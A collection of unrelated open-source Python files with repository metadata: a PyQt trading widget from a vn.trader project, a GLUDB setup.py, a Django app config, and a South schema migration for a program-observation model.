labelAsk5 = QtGui.QLabel(u'卖五')
self.labelBidPrice1 = QtGui.QLabel()
self.labelBidPrice2 = QtGui.QLabel()
self.labelBidPrice3 = QtGui.QLabel()
self.labelBidPrice4 = QtGui.QLabel()
self.labelBidPrice5 = QtGui.QLabel()
self.labelBidVolume1 = QtGui.QLabel()
self.labelBidVolume2 = QtGui.QLabel()
self.labelBidVolume3 = QtGui.QLabel()
self.labelBidVolume4 = QtGui.QLabel()
self.labelBidVolume5 = QtGui.QLabel()
self.labelAskPrice1 = QtGui.QLabel()
self.labelAskPrice2 = QtGui.QLabel()
self.labelAskPrice3 = QtGui.QLabel()
self.labelAskPrice4 = QtGui.QLabel()
self.labelAskPrice5 = QtGui.QLabel()
self.labelAskVolume1 = QtGui.QLabel()
self.labelAskVolume2 = QtGui.QLabel()
self.labelAskVolume3 = QtGui.QLabel()
self.labelAskVolume4 = QtGui.QLabel()
self.labelAskVolume5 = QtGui.QLabel()
labelLast = QtGui.QLabel(u'最新')
self.labelLastPrice = QtGui.QLabel()
self.labelReturn = QtGui.QLabel()
self.labelLastPrice.setMinimumWidth(60)
self.labelReturn.setMinimumWidth(60)
gridRight = QtGui.QGridLayout()
gridRight.addWidget(labelAsk5, 0, 0)
gridRight.addWidget(labelAsk4, 1, 0)
gridRight.addWidget(labelAsk3, 2, 0)
gridRight.addWidget(labelAsk2, 3, 0)
gridRight.addWidget(labelAsk1, 4, 0)
gridRight.addWidget(labelLast, 5, 0)
gridRight.addWidget(labelBid1, 6, 0)
gridRight.addWidget(labelBid2, 7, 0)
gridRight.addWidget(labelBid3, 8, 0)
gridRight.addWidget(labelBid4, 9, 0)
gridRight.addWidget(labelBid5, 10, 0)
gridRight.addWidget(self.labelAskPrice5, 0, 1)
gridRight.addWidget(self.labelAskPrice4, 1, 1)
gridRight.addWidget(self.labelAskPrice3, 2, 1)
gridRight.addWidget(self.labelAskPrice2, 3, 1)
gridRight.addWidget(self.labelAskPrice1, 4, 1)
gridRight.addWidget(self.labelLastPrice, 5, 1)
gridRight.addWidget(self.labelBidPrice1, 6, 1)
gridRight.addWidget(self.labelBidPrice2, 7, 1)
gridRight.addWidget(self.labelBidPrice3, 8, 1)
gridRight.addWidget(self.labelBidPrice4, 9, 1)
gridRight.addWidget(self.labelBidPrice5, 10, 1)
gridRight.addWidget(self.labelAskVolume5, 0, 2)
gridRight.addWidget(self.labelAskVolume4, 1, 2)
gridRight.addWidget(self.labelAskVolume3, 2, 2)
gridRight.addWidget(self.labelAskVolume2, 3, 2)
gridRight.addWidget(self.labelAskVolume1, 4, 2)
gridRight.addWidget(self.labelReturn, 5, 2)
gridRight.addWidget(self.labelBidVolume1, 6, 2)
gridRight.addWidget(self.labelBidVolume2, 7, 2)
gridRight.addWidget(self.labelBidVolume3, 8, 2)
gridRight.addWidget(self.labelBidVolume4, 9, 2)
gridRight.addWidget(self.labelBidVolume5, 10, 2)
# 发单按钮
buttonSendOrder = QtGui.QPushButton(u'发单')
buttonCancelAll = QtGui.QPushButton(u'全撤')
size = buttonSendOrder.sizeHint()
buttonSendOrder.setMinimumHeight(size.height()*2) # 把按钮高度设为默认两倍
buttonCancelAll.setMinimumHeight(size.height()*2)
# 整合布局
hbox = QtGui.QHBoxLayout()
hbox.addLayout(gridleft)
hbox.addLayout(gridRight)
vbox = QtGui.QVBoxLayout()
vbox.addLayout(hbox)
vbox.addWidget(buttonSendOrder)
vbox.addWidget(buttonCancelAll)
vbox.addStretch()
self.setLayout(vbox)
# 关联更新
buttonSendOrder.clicked.connect(self.sendOrder)
buttonCancelAll.clicked.connect(self.cancelAll)
self.lineSymbol.returnPressed.connect(self.updateSymbol)
#----------------------------------------------------------------------
def updateSymbol(self):
"""合约变化"""
# 读取组件数据
symbol = str(self.lineSymbol.text())
exchange = unicode(self.comboExchange.currentText())
currency = unicode(self.comboCurrency.currentText())
productClass = unicode(self.comboProductClass.currentText())
gatewayName = unicode(self.comboGateway.currentText())
# 查询合约
if exchange:
vtSymbol = '.'.join([symbol, exchange])
contract = self.mainEngine.getContract(vtSymbol)
else:
vtSymbol = symbol
contract = self.mainEngine.getContract(symbol)
if contract:
vtSymbol = contract.vtSymbol
gatewayName = contract.gatewayName
self.lineName.setText(contract.name)
exchange = contract.exchange # 保证有交易所代码
# 清空价格数量
self.spinPrice.setValue(0)
self.spinVolume.setValue(0)
# 清空行情显示
self.labelBidPrice1.setText('')
self.labelBidPrice2.setText('')
self.labelBidPrice3.setText('')
self.labelBidPrice4.setText('')
self.labelBidPrice5.setText('')
self.labelBidVolume1.setText('')
self.labelBidVolume2.setText('')
self.labelBidVolume3.setText('')
self.labelBidVolume4.setText('')
self.labelBidVolume5.setText('')
self.labelAskPrice1.setText('')
self.labelAskPrice2.setText('')
self.labelAskPrice3.setText('')
self.labelAskPrice4.setText('')
self.labelAskPrice5.setText('')
self.labelAskVolume1.setText('')
self.labelAskVolume2.setText('')
self.labelAskVolume3.setText('')
self.labelAskVolume4.setText('')
self.labelAskVolume5.setText('')
self.labelLastPrice.setText('')
self.labelReturn.setText('')
# 重新注册事件监听
self.eventEngine.unregister(EVENT_TICK + self.symbol, self.signal.emit)
self.eventEngine.register(EVENT_TICK + vtSymbol, self.signal.emit)
# 订阅合约
req = VtSubscribeReq()
req.symbol = symbol
req.exchange = exchange
req.currency = currency
req.productClass = productClass
# 默认跟随价
self.checkFixed.setChecked(False)
self.mainEngine.subscribe(req, gatewayName)
# 更新组件当前交易的合约
self.symbol = vtSymbol
#----------------------------------------------------------------------
def updateTick(self, event):
"""更新行情"""
tick = event.dict_['data']
if tick.vtSymbol == self.symbol:
if not self.checkFixed.isChecked():
self.spinPrice.setValue(tick.lastPrice)
self.labelBidPrice1.setText(str(tick.bidPrice1))
self.labelAskPrice1.setText(str(tick.askPrice1))
self.labelBidVolume1.setText(str(tick.bidVolume1))
self.labelAskVolume1.setText(str(tick.askVolume1))
if tick.bidPrice2:
self.labelBidPrice2.setText(str(tick.bidPrice2))
self.labelBidPrice3.setText(str(tick.bidPrice3))
self.labelBidPrice4.setText(str(tick.bidPrice4))
self.labelBidPrice5.setText(str(tick.bidPrice5))
self.labelAskPrice2.setText(str(tick.askPrice2))
self.labelAskPrice3.setText(str(tick.askPrice3))
self.labelAskPrice4.setText(str(tick.askPrice4))
self.labelAskPrice5.setText(str(tick.askPrice5))
self.labelBidVolume2.setText(str(tick.bidVolume2))
self.labelBidVolume3.setText(str(tick.bidVolume3))
self.labelBidVolume4.setText(str(tick.bidVolume4))
self.labelBidVolume5.setText(str(tick.bidVolume5))
self.labelAskVolume2.setText(str(tick.askVolume2))
self.labelAskVolume3.setText(str(tick.askVolume3))
self.labelAskVolume4.setText(str(tick.askVolume4))
self.labelAskVolume5.setText(str(tick.askVolume5))
self.labelLastPrice.setText(str(tick.lastPrice))
if tick.preClosePrice:
rt = (tick.lastPrice/tick.preClosePrice)-1
self.labelReturn.setText(('%.2f' %(rt*100))+'%')
else:
self.labelReturn.setText('')
#----------------------------------------------------------------------
def connectSignal(self):
"""连接Signal"""
self.signal.connect(self.updateTick)
#----------------------------------------------------------------------
def sendOrder(self):
"""发单"""
symbol = str(self.lineSymbol.text())
exchange = unicode(self.comboExchange.currentText())
currency = unicode(self.comboCurrency.currentText())
productClass = unicode(self.comboProductClass.currentText())
gatewayName = unicode(self.comboGateway.currentText())
# 查询合约
if exchange:
vtSymbol = '.'.join([symbol, exchange])
contract = self.mainEngine.getContract(vtSymbol)
else:
vtSymbol = symbol
contract = self.mainEngine.getContract(symbol)
if contract:
gatewayName = contract.gatewayName
exchange = contract.exchange # 保证有交易所代码
req = VtOrderReq()
req.symbol = symbol
req.exchange = exchange
req.price = self.spinPrice.value()
req.volume = self.spinVolume.value()
req.direction = unicode(self.comboDirection.currentText())
req.priceType = unicode(self.comboPriceType.currentText())
req.offset = unicode(self.comboOffset.currentText())
req.currency = currency
req.productClass = productClass
self.mainEngine.sendOrder(req, gatewayName)
#----------------------------------------------------------------------
def cancelAll(self):
"""一键撤销所有委托"""
l = self.mainEngine.getAllWorkingOrders()
for order in l:
req = VtCancelOrderReq()
req.symbol = order.symbol
req.exchange = order.exchange
req.frontID = order.frontID
req.sessionID = order.sessionID
req.orderID = order.orderID
self.mainEngine.cancelOrder(req, order.gatewayName)
#----------------------------------------------------------------------
def closePosition(self, cell):
"""根据持仓信息自动填写交易组件"""
# 读取持仓数据,cell是一个表格中的单元格对象
pos = cell.data
symbol = pos.symbol
# 更新交易组件的显示合约
self.lineSymbol.setText(symbol)
self.updateSymbol()
# 自动填写信息
self.comboPriceType.setCurrentIndex(self.priceTypeList.index(PRICETYPE_LIMITPRICE))
self.comboOffset.setCurrentIndex(self.offsetList.index(OFFSET_CLOSE))
self.spinVolume.setValue(pos.position)
if pos.direction == DIRECTION_LONG or pos.direction == DIRECTION_NET:
self.comboDirection.setCurrentIndex(self.directionList.index(DIRECTION_SHORT))
else:
self.comboDirection.setCurrentIndex(self.directionList.index(DIRECTION_LONG))
# 价格留待更新后由用户输入,防止有误操作
########################################################################
class ContractMonitor(BasicMonitor):
"""合约查询"""
#----------------------------------------------------------------------
def __init__(self, mainEngine, parent=None):
"""Constructor"""
super(ContractMonitor, self).__init__(parent=parent)
self.mainEngine = mainEngine
d = OrderedDict()
d['symbol'] = {'chinese':u'合约代码', 'cellType':BasicCell}
d['exchange'] = {'chinese':u'交易所', 'cellType':BasicCell}
d['vtSymbol'] = {'chinese':u'vt系统代码', 'cellType':BasicCell}
d['name'] = {'chinese':u'名称', 'cellType':BasicCell}
d['productClass'] = {'chinese':u'合约类型', 'cellType':BasicCell}
d['size'] = {'chinese':u'大小', 'cellType':BasicCell}
d['priceTick'] = {'chinese':u'最小价格变动', 'cellType':BasicCell}
#d['strikePrice'] = {'chinese':u'期权行权价', 'cellType':BasicCell}
#d['underlyingSymbol'] = {'chinese':u'期权标的物', 'cellType':BasicCell}
#d['optionType'] = {'chinese':u'期权类型', 'cellType':BasicCell}
self.setHeaderDict(d)
self.initUi()
#----------------------------------------------------------------------
def initUi(self):
"""初始化界面"""
self.setWindowTitle(u'合约查询')
self.setMinimumSize(800, 800)
self.setFont(BASIC_FONT)
self.initTable()
self.addMenuAction()
#----------------------------------------------------------------------
def showAllContracts(self):
"""显示所有合约数据"""
l = self.mainEngine.getAllContracts()
d = {'.'.join([contract.exchange, contract.symbol]):contract for contract in l}
l2 = d.keys()
l2.sort(reverse=True)
self.setRowCount(len(l2))
row = 0
for key in l2:
contract = d[key]
for n, header in enumerate(self.headerList):
content = safeUnicode(contract.__getattribute__(header))
cellType = self.headerDict[header]['cellType']
cell = cellType(content)
if self.font:
cell.setFont(self.font) # 如果设置了特殊字体,则进行单元格设置
self.setItem(row, n, cell)
row = row + 1
#----------------------------------------------------------------------
def refresh(self):
"""刷新"""
self.menu.close() # 关闭菜单
self.clearContents()
self.setRowCount(0)
self.showAllContracts()
#----------------------------------------------------------------------
def addMenuAction(self):
"""增加右键菜单内容"""
refreshAction = QtGui.QAction(u'刷新', self)
refreshAction.triggered.connect(self.refresh)
self.menu.addAction(refreshAction)
#----------------------------------------------------------------------
def show(self):
"""显示"""
super(ContractMonitor, self).show()
self.refresh()
|
{
"content_hash": "ffdc7dd38e4a1bd2b7558ba5639284b8",
"timestamp": "",
"source": "github",
"line_count": 1115,
"max_line_length": 91,
"avg_line_length": 36.75874439461884,
"alnum_prop": 0.49931683989655007,
"repo_name": "freeitaly/Trading-System",
"id": "691500344d3179701977adfc2044c160f72dbb91",
"size": "43495",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "vn.trader/uiBasicWidget.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "2004570"
},
{
"name": "C++",
"bytes": "4252575"
},
{
"name": "CMake",
"bytes": "7062"
},
{
"name": "Jupyter Notebook",
"bytes": "10948"
},
{
"name": "Objective-C",
"bytes": "139190"
},
{
"name": "Python",
"bytes": "5255125"
},
{
"name": "R",
"bytes": "1354"
},
{
"name": "Shell",
"bytes": "5174"
}
],
"symlink_target": ""
}
|
"""Main setup script for GLUDB."""
from codecs import open
from os import path
# Always prefer setuptools over distutils
from setuptools import setup
here = path.abspath(path.dirname(__file__))
# Get the long description from the relevant file
# Note that we are using README.rst - it is generated from README.md in
# build.sh
with open(path.join(here, 'README.rst'), encoding='utf-8') as f:
long_description = f.read()
setup(
name='gludb',
version='0.2.0',
description='A simple database wrapper',
long_description=long_description,
url='https://github.com/memphis-iis/GLUDB',
author='University of Memphis Institute for Intelligent Systems',
author_email='cnkelly@memphis.edu',
license='Apache Version 2.0',
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Topic :: Database',
'Topic :: Software Development :: Libraries',
'Topic :: System :: Archiving :: Backup',
'License :: OSI Approved :: Apache Software License',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
],
keywords='database versioning backup'
'sqlite dynamodb cloud datastore mongodb',
packages=['gludb', 'gludb.backends'],
install_requires=[
"json_delta>=1.1.3",
],
# List additional groups of dependencies here (e.g. development
# dependencies). You can install these using the following syntax,
# for example:
# $ pip install -e .[dev,test]
extras_require={
'dev': [],
'test': ['coverage', 'nose', 'tornado'],
'dynamodb': ['boto'],
'gcd': ['googledatastore'],
'mongodb': ['pymongo'],
'postgresql': ['psycopg2'],
'backups': ['boto'],
},
package_data={},
data_files=[],
entry_points={},
)
|
{
"content_hash": "f3505846f4c12f9bd5679617c35dc665",
"timestamp": "",
"source": "github",
"line_count": 73,
"max_line_length": 71,
"avg_line_length": 29.027397260273972,
"alnum_prop": 0.6087777253421425,
"repo_name": "memphis-iis/GLUDB",
"id": "3c021d769dbe9e48ca669a58ff129de5d79e3ab0",
"size": "2119",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "118902"
},
{
"name": "Shell",
"bytes": "7570"
}
],
"symlink_target": ""
}
|
from django.apps import AppConfig
from django.utils.translation import gettext_lazy as _
class DjangoTwitterPhotoApiConfig(AppConfig):
name = 'django_twitter_photo_api'
verbose_name = _("Twitter photostream backend")
|
{
"content_hash": "dc4b7e1b50e135f8ff92e18e6d2a0b52",
"timestamp": "",
"source": "github",
"line_count": 7,
"max_line_length": 54,
"avg_line_length": 32.285714285714285,
"alnum_prop": 0.7787610619469026,
"repo_name": "softformance/django-twitter-photo-api",
"id": "6be37050acb25f10bc7090520a99c358f550f757",
"size": "246",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "django_twitter_photo_api/apps.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "1874"
},
{
"name": "Makefile",
"bytes": "1626"
},
{
"name": "Python",
"bytes": "30209"
}
],
"symlink_target": ""
}
|
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'ProgramObservation'
db.create_table(u'director_programobservation', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('created', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
('last_updated', self.gf('django.db.models.fields.DateTimeField')(auto_now=True, null=True, blank=True)),
('rating_count', self.gf('django.db.models.fields.IntegerField')(default=1, max_length=1000)),
('observation_entered', self.gf('django.db.models.fields.DateTimeField')(auto_now=True, null=True, blank=True)),
('entered_by', self.gf('django.db.models.fields.related.ForeignKey')(max_length=250, to=orm['auth.User'], null=True, blank=True)),
('program', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['director.ProgramInfo'])),
('metric_cost', self.gf('django.db.models.fields.CharField')(default='Yellow', max_length=10)),
('trend_cost', self.gf('django.db.models.fields.CharField')(default='Middle', max_length=10)),
('summary_cost', self.gf('django.db.models.fields.TextField')(null=True, blank=True)),
('metric_schedule', self.gf('django.db.models.fields.CharField')(default='Yellow', max_length=10)),
('trend_schedule', self.gf('django.db.models.fields.CharField')(default='Middle', max_length=10)),
('summary_schedule', self.gf('django.db.models.fields.TextField')(null=True, blank=True)),
('metric_performance', self.gf('django.db.models.fields.CharField')(default='Yellow', max_length=10)),
('trend_performance', self.gf('django.db.models.fields.CharField')(default='Middle', max_length=10)),
('summary_performance', self.gf('django.db.models.fields.TextField')(null=True, blank=True)),
('metric_risk', self.gf('django.db.models.fields.CharField')(default='Yellow', max_length=10)),
('trend_risk', self.gf('django.db.models.fields.CharField')(default='Middle', max_length=10)),
('summary_risk', self.gf('django.db.models.fields.TextField')(null=True, blank=True)),
))
db.send_create_signal(u'director', ['ProgramObservation'])
# Deleting field 'ProgramInfo.last_updated'
db.delete_column(u'director_programinfo', 'last_updated')
# Deleting field 'ProgramInfo.rating_count'
db.delete_column(u'director_programinfo', 'rating_count')
# Deleting field 'ProgramInfo.trend_schedule'
db.delete_column(u'director_programinfo', 'trend_schedule')
# Deleting field 'ProgramInfo.metric_cost'
db.delete_column(u'director_programinfo', 'metric_cost')
# Deleting field 'ProgramInfo.trend_performance'
db.delete_column(u'director_programinfo', 'trend_performance')
# Deleting field 'ProgramInfo.metric_performance'
db.delete_column(u'director_programinfo', 'metric_performance')
# Deleting field 'ProgramInfo.metric_risk'
db.delete_column(u'director_programinfo', 'metric_risk')
# Deleting field 'ProgramInfo.trend_risk'
db.delete_column(u'director_programinfo', 'trend_risk')
# Deleting field 'ProgramInfo.summary_schedule'
db.delete_column(u'director_programinfo', 'summary_schedule')
# Deleting field 'ProgramInfo.summary_cost'
db.delete_column(u'director_programinfo', 'summary_cost')
# Deleting field 'ProgramInfo.created'
db.delete_column(u'director_programinfo', 'created')
# Deleting field 'ProgramInfo.metric_schedule'
db.delete_column(u'director_programinfo', 'metric_schedule')
# Deleting field 'ProgramInfo.summary_risk'
db.delete_column(u'director_programinfo', 'summary_risk')
# Deleting field 'ProgramInfo.summary_performance'
db.delete_column(u'director_programinfo', 'summary_performance')
# Deleting field 'ProgramInfo.trend_cost'
db.delete_column(u'director_programinfo', 'trend_cost')
def backwards(self, orm):
# Deleting model 'ProgramObservation'
db.delete_table(u'director_programobservation')
# Adding field 'ProgramInfo.last_updated'
db.add_column(u'director_programinfo', 'last_updated',
self.gf('django.db.models.fields.DateTimeField')(auto_now=True, null=True, blank=True),
keep_default=False)
# Adding field 'ProgramInfo.rating_count'
db.add_column(u'director_programinfo', 'rating_count',
self.gf('django.db.models.fields.IntegerField')(default=1, max_length=1000),
keep_default=False)
# Adding field 'ProgramInfo.trend_schedule'
db.add_column(u'director_programinfo', 'trend_schedule',
self.gf('django.db.models.fields.CharField')(default='Middle', max_length=10),
keep_default=False)
# Adding field 'ProgramInfo.metric_cost'
db.add_column(u'director_programinfo', 'metric_cost',
self.gf('django.db.models.fields.CharField')(default='Yellow', max_length=10),
keep_default=False)
# Adding field 'ProgramInfo.trend_performance'
db.add_column(u'director_programinfo', 'trend_performance',
self.gf('django.db.models.fields.CharField')(default='Middle', max_length=10),
keep_default=False)
# Adding field 'ProgramInfo.metric_performance'
db.add_column(u'director_programinfo', 'metric_performance',
self.gf('django.db.models.fields.CharField')(default='Yellow', max_length=10),
keep_default=False)
# Adding field 'ProgramInfo.metric_risk'
db.add_column(u'director_programinfo', 'metric_risk',
self.gf('django.db.models.fields.CharField')(default='Yellow', max_length=10),
keep_default=False)
# Adding field 'ProgramInfo.trend_risk'
db.add_column(u'director_programinfo', 'trend_risk',
self.gf('django.db.models.fields.CharField')(default='Middle', max_length=10),
keep_default=False)
# Adding field 'ProgramInfo.summary_schedule'
db.add_column(u'director_programinfo', 'summary_schedule',
self.gf('django.db.models.fields.TextField')(null=True, blank=True),
keep_default=False)
# Adding field 'ProgramInfo.summary_cost'
db.add_column(u'director_programinfo', 'summary_cost',
self.gf('django.db.models.fields.TextField')(null=True, blank=True),
keep_default=False)
# Adding field 'ProgramInfo.created'
db.add_column(u'director_programinfo', 'created',
self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, default=datetime.datetime(2013, 10, 3, 0, 0), blank=True),
keep_default=False)
# Adding field 'ProgramInfo.metric_schedule'
db.add_column(u'director_programinfo', 'metric_schedule',
self.gf('django.db.models.fields.CharField')(default='Yellow', max_length=10),
keep_default=False)
# Adding field 'ProgramInfo.summary_risk'
db.add_column(u'director_programinfo', 'summary_risk',
self.gf('django.db.models.fields.TextField')(null=True, blank=True),
keep_default=False)
# Adding field 'ProgramInfo.summary_performance'
db.add_column(u'director_programinfo', 'summary_performance',
self.gf('django.db.models.fields.TextField')(null=True, blank=True),
keep_default=False)
# Adding field 'ProgramInfo.trend_cost'
db.add_column(u'director_programinfo', 'trend_cost',
self.gf('django.db.models.fields.CharField')(default='Middle', max_length=10),
keep_default=False)
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'director.dashboardwidgets': {
'Meta': {'ordering': "['order']", 'object_name': 'DashboardWidgets'},
'dashboard': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['director.DirectorDashboard']"}),
'height': ('django.db.models.fields.IntegerField', [], {'default': '250', 'max_length': '3'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'order': ('django.db.models.fields.IntegerField', [], {}),
'widget': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['director.PageWidget']"}),
'width': ('django.db.models.fields.IntegerField', [], {'default': '6', 'max_length': '2'})
},
u'director.directordashboard': {
'Meta': {'ordering': "['org']", 'object_name': 'DirectorDashboard'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'org': ('django.db.models.fields.CharField', [], {'max_length': '20', 'null': 'True', 'blank': 'True'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'max_length': '250', 'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'}),
'page_widgets': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['director.PageWidget']", 'null': 'True', 'through': u"orm['director.DashboardWidgets']", 'blank': 'True'}),
'related_programs': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['director.ProgramInfo']", 'null': 'True', 'blank': 'True'}),
'site_icon': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '1', 'max_length': '1'}),
'tags': ('django.db.models.fields.CharField', [], {'max_length': '75', 'null': 'True', 'blank': 'True'}),
'tracking_code': ('django.db.models.fields.CharField', [], {'max_length': '250', 'null': 'True', 'blank': 'True'}),
'type': ('django.db.models.fields.CharField', [], {'default': "'Portal'", 'max_length': '10'})
},
u'director.pagewidget': {
'Meta': {'ordering': "['name']", 'object_name': 'PageWidget'},
'data_json': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'icon': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '20'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'iframe_url': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'iframe_url_if_local': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '200'}),
'render_function': ('django.db.models.fields.CharField', [], {'default': "'notesAndChildNotes'", 'max_length': '60'}),
'subtext': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '30', 'null': 'True', 'blank': 'True'}),
'theme': ('django.db.models.fields.CharField', [], {'default': "'Thin'", 'max_length': '10'}),
'type': ('django.db.models.fields.CharField', [], {'default': "'Wiki'", 'max_length': '10'}),
'url': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'})
},
u'director.programinfo': {
'Meta': {'ordering': "['name']", 'object_name': 'ProgramInfo'},
'details': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'management_poc': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '200'}),
'technical_poc': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'url': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'})
},
u'director.programobservation': {
'Meta': {'object_name': 'ProgramObservation'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'entered_by': ('django.db.models.fields.related.ForeignKey', [], {'max_length': '250', 'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'null': 'True', 'blank': 'True'}),
'metric_cost': ('django.db.models.fields.CharField', [], {'default': "'Yellow'", 'max_length': '10'}),
'metric_performance': ('django.db.models.fields.CharField', [], {'default': "'Yellow'", 'max_length': '10'}),
'metric_risk': ('django.db.models.fields.CharField', [], {'default': "'Yellow'", 'max_length': '10'}),
'metric_schedule': ('django.db.models.fields.CharField', [], {'default': "'Yellow'", 'max_length': '10'}),
'observation_entered': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'null': 'True', 'blank': 'True'}),
'program': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['director.ProgramInfo']"}),
'rating_count': ('django.db.models.fields.IntegerField', [], {'default': '1', 'max_length': '1000'}),
'summary_cost': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'summary_performance': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'summary_risk': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'summary_schedule': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'trend_cost': ('django.db.models.fields.CharField', [], {'default': "'Middle'", 'max_length': '10'}),
'trend_performance': ('django.db.models.fields.CharField', [], {'default': "'Middle'", 'max_length': '10'}),
'trend_risk': ('django.db.models.fields.CharField', [], {'default': "'Middle'", 'max_length': '10'}),
'trend_schedule': ('django.db.models.fields.CharField', [], {'default': "'Middle'", 'max_length': '10'})
}
}
complete_apps = ['director']
|
{
"content_hash": "ac6a5f748dcb8863fa69d9fa7d183c28",
"timestamp": "",
"source": "github",
"line_count": 270,
"max_line_length": 228,
"avg_line_length": 68.75925925925925,
"alnum_prop": 0.5838405601939133,
"repo_name": "ngageoint/geoevents",
"id": "f440364c41c792a508b5b2b8fff3d8b8e49b7efe",
"size": "18589",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "geoevents/director/migrations/0015_auto__add_programobservation__del_field_programinfo_last_updated__del_.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "7006"
